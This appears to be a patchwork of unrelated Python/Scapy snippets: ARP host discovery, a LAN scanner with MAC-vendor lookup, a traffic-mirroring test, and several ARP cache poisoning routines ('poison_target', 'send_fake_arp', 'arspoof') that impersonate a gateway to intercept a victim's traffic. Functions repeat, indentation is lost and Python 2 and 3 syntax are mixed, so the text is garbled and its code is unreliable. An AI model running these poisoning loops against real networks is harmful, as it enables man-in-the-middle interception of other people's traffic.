def get_mac(ip_1):
print("[\033[32m+\033[00m] Getting mac address")
arping = Ether(dst = ETHER_BROADCAST) / ARP(pdst = ip_1)
os.write(1, "[\033[32m+\033[00m] ")
rep, norep = srp(arping, timeout = 2)
for snd, rcv in rep:
return rcv.sprintf(r"%Ether.src%")
def arp_packet(hwsrc, psrc, hwdst, pdst):
arp_packet = ARP(hwsrc=hwsrc, psrc=psrc, hwdst=hwdst, pdst=pdst, op=1)
arp = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) \
/ SNAP(OUI=0x000000, code=0x0806) \
/ arp_packet
return arp
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print "[*] Restoring target..."
# using a different method to send (from the one above to poison target)
# restore target. state gateway to its real mac
send(ARP(op=2,
psrc=gateway_ip,
pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=gateway_mac),
count=5)
# restore gateway. state target to its real macss
send(ARP(op=2,
psrc=target_ip,
pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=target_mac),
count=5)
def arp_ping(host):
"""ARP Ping"""
# The fastest way to discover hosts on a local ethernet network is to use the ARP Ping method:
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=host), timeout=2)
# Answers can be reviewed with the following command:
ans.summary(lambda (s, r): r.sprintf("%Ether.src% %ARP.psrc%"))
def scan_network():
found = []
ip = network_data.get_ip('wlp3s0') + '/24'
answered_list = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip),
timeout=2)[0]
if len(answered_list) > 0:
for answer in answered_list:
found.append(answer[1].psrc)
return found
def get_mac(ip_address):
# Send and receive packets at layer 2
responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst=ip_address),
timeout=2,
retry=10)
# return the MAC address from a response
for s, r in responses:
return r[Ether].src
return None
def send_fake_arp(gateway_ip, gateway_mac, target_ip, target_mac, stop_event):
poison_target = ARP(op=2,
psrc=gateway_ip,
pdst=target_ip,
hwdst=target_mac)
poison_gateway = ARP(op=2,
psrc=target_ip,
pdst=gateway_ip,
hwdst=gateway_mac)
logger.info("start fake arp reply sender")
while True:
logger.debug("send fake arp reply to %s" % target_ip)
send(poison_target)
logger.debug("send fake arp reply to %s" % gateway_ip)
send(poison_gateway)
if stop_event.wait(3):
break
logger.info("stop fake arp reply sender")
return
def network_scan(ip):
answered_list = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip),
timeout=1,
verbose=False)[0]
clients_list = []
if len(answered_list) > 0:
answered_list.sort(key=lambda value: value[1].psrc)
answered_list.sort(key=lambda value: len(value[1].psrc))
print('Found these devices on', ip,
'\n------------------------------------------')
for answer in answered_list:
print(answer[1].psrc, '\t\t', answer[1].hwsrc)
client = {'ip': answer[1].psrc, 'mac': answer[1].hwsrc}
clients_list.append(client)
else:
print('No devices were found on your network')
return clients_list
def main():
"""Send a simple L2 or ICMP packet from one TG interface to DUT, then
receive a copy of the packet on the second TG interface, and a copy of
the ICMP reply."""
args = TrafficScriptArg(
['tg_src_mac', 'src_ip', 'dst_ip', 'dut_if1_mac', 'ptype'])
src_mac = args.get_arg('tg_src_mac')
dst_mac = args.get_arg('dut_if1_mac')
src_ip = args.get_arg('src_ip')
dst_ip = args.get_arg('dst_ip')
tx_if = args.get_arg('tx_if')
rx_if = args.get_arg('rx_if')
ptype = args.get_arg('ptype')
rxq_mirrored = RxQueue(rx_if)
rxq_tx = RxQueue(tx_if)
txq = TxQueue(tx_if)
sent = []
if ptype == "ARP":
pkt_raw = (Ether(src=src_mac, dst=dst_mac) /
ARP(hwsrc=src_mac,
hwdst="00:00:00:00:00:00",
psrc=src_ip,
pdst=dst_ip,
op="who-has"))
elif ptype == "ICMP":
if valid_ipv4(src_ip) and valid_ipv4(dst_ip):
pkt_raw = (Ether(src=src_mac, dst=dst_mac) /
IP(src=src_ip, dst=dst_ip) / ICMP(type="echo-request"))
else:
raise ValueError("IP addresses not in correct format")
elif ptype == "ICMPv6":
if valid_ipv6(src_ip) and valid_ipv6(dst_ip):
pkt_raw = (Ether(src=src_mac, dst=dst_mac) /
IPv6(src=src_ip, dst=dst_ip) / ICMPv6EchoRequest())
else:
raise ValueError("IPv6 addresses not in correct format")
else:
raise RuntimeError("Unexpected payload type.")
txq.send(pkt_raw)
sent.append(auto_pad(pkt_raw))
ether = rxq_mirrored.recv(2)
# Receive copy of Rx packet.
if ether is None:
raise RuntimeError("Rx timeout of mirrored Rx packet")
pkt = auto_pad(pkt_raw)
if str(ether) != str(pkt):
print("Mirrored Rx packet doesn't match the original Rx packet.")
if ether.src != src_mac or ether.dst != dst_mac:
raise RuntimeError("MAC mismatch in mirrored Rx packet.")
if ptype == "ARP":
if not ether.haslayer(ARP):
raise RuntimeError("Mirrored Rx packet is not an ARP packet.")
if ether['ARP'].op != 1: # 1=who-has
raise RuntimeError("Mirrored Rx packet is not an ARP request.")
if ether['ARP'].hwsrc != src_mac or ether['ARP'].hwdst != dst_mac:
raise RuntimeError("MAC mismatch in mirrored Rx ARP packet.")
if ether['ARP'].psrc != src_ip or ether['ARP'].pdst != dst_ip:
raise RuntimeError("IP address mismatch in mirrored "
"Rx ARP packet.")
elif ptype == "ICMP":
if not ether.haslayer(IP):
raise RuntimeError("Mirrored Rx packet is not an IPv4 packet.")
if ether['IP'].src != src_ip or ether['IP'].dst != dst_ip:
raise RuntimeError("IP address mismatch in mirrored "
"Rx IPv4 packet.")
if not ether.haslayer(ICMP):
raise RuntimeError("Mirrored Rx packet is not an ICMP packet.")
if ether['ICMP'].type != 8: # 8=echo-request
raise RuntimeError("Mirrored Rx packet is not an ICMP "
"echo request.")
elif ptype == "ICMPv6":
if not ether.haslayer(IPv6):
raise RuntimeError("Mirrored Rx packet is not an IPv6 packet.")
if ether['IPv6'].src != src_ip or ether['IPv6'].dst != dst_ip:
raise RuntimeError("IP address mismatch in mirrored "
"Rx IPv6 packet.")
if not ether.haslayer(ICMPv6EchoRequest):
raise RuntimeError("Mirrored Rx packet is not an ICMPv6 "
"echo request.")
print("Mirrored Rx packet check OK.\n")
# Receive reply on TG Tx port.
ether_repl = rxq_tx.recv(2, sent)
if ether_repl is None:
raise RuntimeError("Reply not received on TG Tx port.")
else:
print("Reply received on TG Tx port.\n")
# Receive copy of Tx packet.
ether = rxq_mirrored.recv(2)
if ether is None:
raise RuntimeError("Rx timeout of mirrored Tx packet")
if str(ether) != str(ether_repl):
print("Mirrored Tx packet doesn't match the received Tx packet.")
if ether.src != ether_repl.src or ether.dst != ether_repl.dst:
raise RuntimeError("MAC mismatch in mirrored Tx packet.")
if ptype == "ARP":
if not ether.haslayer(ARP):
raise RuntimeError("Mirrored Tx packet is not an ARP packet.")
if ether['ARP'].op != ether_repl['ARP'].op: # 2=is_at
raise RuntimeError("ARP operational code mismatch "
"in mirrored Tx packet.")
if ether['ARP'].hwsrc != ether_repl['ARP'].hwsrc\
or ether['ARP'].hwdst != ether_repl['ARP'].hwdst:
raise RuntimeError("MAC mismatch in mirrored Tx ARP packet.")
if ether['ARP'].psrc != ether_repl['ARP'].psrc\
or ether['ARP'].pdst != ether_repl['ARP'].pdst:
raise RuntimeError("IP address mismatch in mirrored "
"Tx ARP packet.")
elif ptype == "ICMP":
if not ether.haslayer(IP):
raise RuntimeError("Mirrored Tx packet is not an IPv4 packet.")
if ether['IP'].src != ether_repl['IP'].src\
or ether['IP'].dst != ether_repl['IP'].dst:
raise RuntimeError("IP address mismatch in mirrored "
"Tx IPv4 packet.")
if not ether.haslayer(ICMP):
raise RuntimeError("Mirrored Tx packet is not an ICMP packet.")
if ether['ICMP'].type != ether_repl['ICMP'].type: # 0=echo-reply
raise RuntimeError("ICMP packet type mismatch "
"in mirrored Tx packet.")
elif ptype == "ICMPv6":
if not ether.haslayer(IPv6):
raise RuntimeError("Mirrored Tx packet is not an IPv6 packet.")
if ether['IPv6'].src != ether_repl['IPv6'].src\
or ether['IPv6'].dst != ether_repl['IPv6'].dst:
raise RuntimeError("IP address mismatch in mirrored "
"Tx IPv6 packet.")
if ether[2].name != ether_repl[2].name:
raise RuntimeError("ICMPv6 message type mismatch "
"in mirrored Tx packet.")
print("Mirrored Tx packet check OK.\n")
sys.exit(0)
def get_mac(ip_address):
responses, unanswered = srp(Ether(
dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=3, retry=10)
for s, r in responses:
return r[Ether].src
return None
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
logger.info("restoring target arp cache")
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
def chi_e_pf():
sendp(
Ether(dst=broadcast_mac, src=my_mac) /
ARP(op=1, psrc=my_ip, pdst=gateway_ip))
def clean(ip_1, ip_2):
trame = ARP(op = 2, pdst = ip_2, hwdst = get_mac(ip_1))
print("[\033[32m+\033[00m] Cleaning target's cache")
send(trame, count = 5)
print ("[\033[32m+\033[00m] Quitting")
def arspoof(ip_1, ip_2, regex_mac):
trame = ARP(op = 2, psrc = ip_1, pdst = ip_2, hwdst = get_mac(ip_1))
trame.show()
print("[\033[32m+\033[00m] Sending packets to " + ip_2)
os.write(1, "[\033[32m+\033[00m] ")
srp(trame)
def chi_e_h():
sendp(
Ether(dst=broadcast_mac, src=my_mac) /
ARP(op=1, psrc=my_ip, pdst=victim_ip))
from scapy.all import *
from scapy.layers.inet import ARP, Ether
import os
import requests as req
blue = '\033[94m'
green = '\033[32m'
red = '\033[91m'
w = '\033[0m'
os.system("cls")
print(red + "Scaning...")
ipp = ("192.168.1.")
for addr in range(255):
ip = ipp + str(addr)
ans = sr1(ARP(pdst=ip), timeout=3, verbose=0)
if ans:
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=ip)
resp, unans = srp(arp_frame, verbose=0)
for s, r in resp:
macAdress = r[Ether].src
resp = req.get("https://api.macvendors.com/{}".format(macAdress))
vendor = resp.text
print(green + "[*]" + ip + " " + macAdress + " " + vendor)
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
# FUN FUN
poison_target = ARP()
poison_target.op = 2 # IS AT
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
# If I dont specify hwsrc does it imply mine? where I'm sending the attack from?
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
# we keep emitting these ARP requests in a loop to make sure the cache entries remain poisoned for the duration of the attack
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return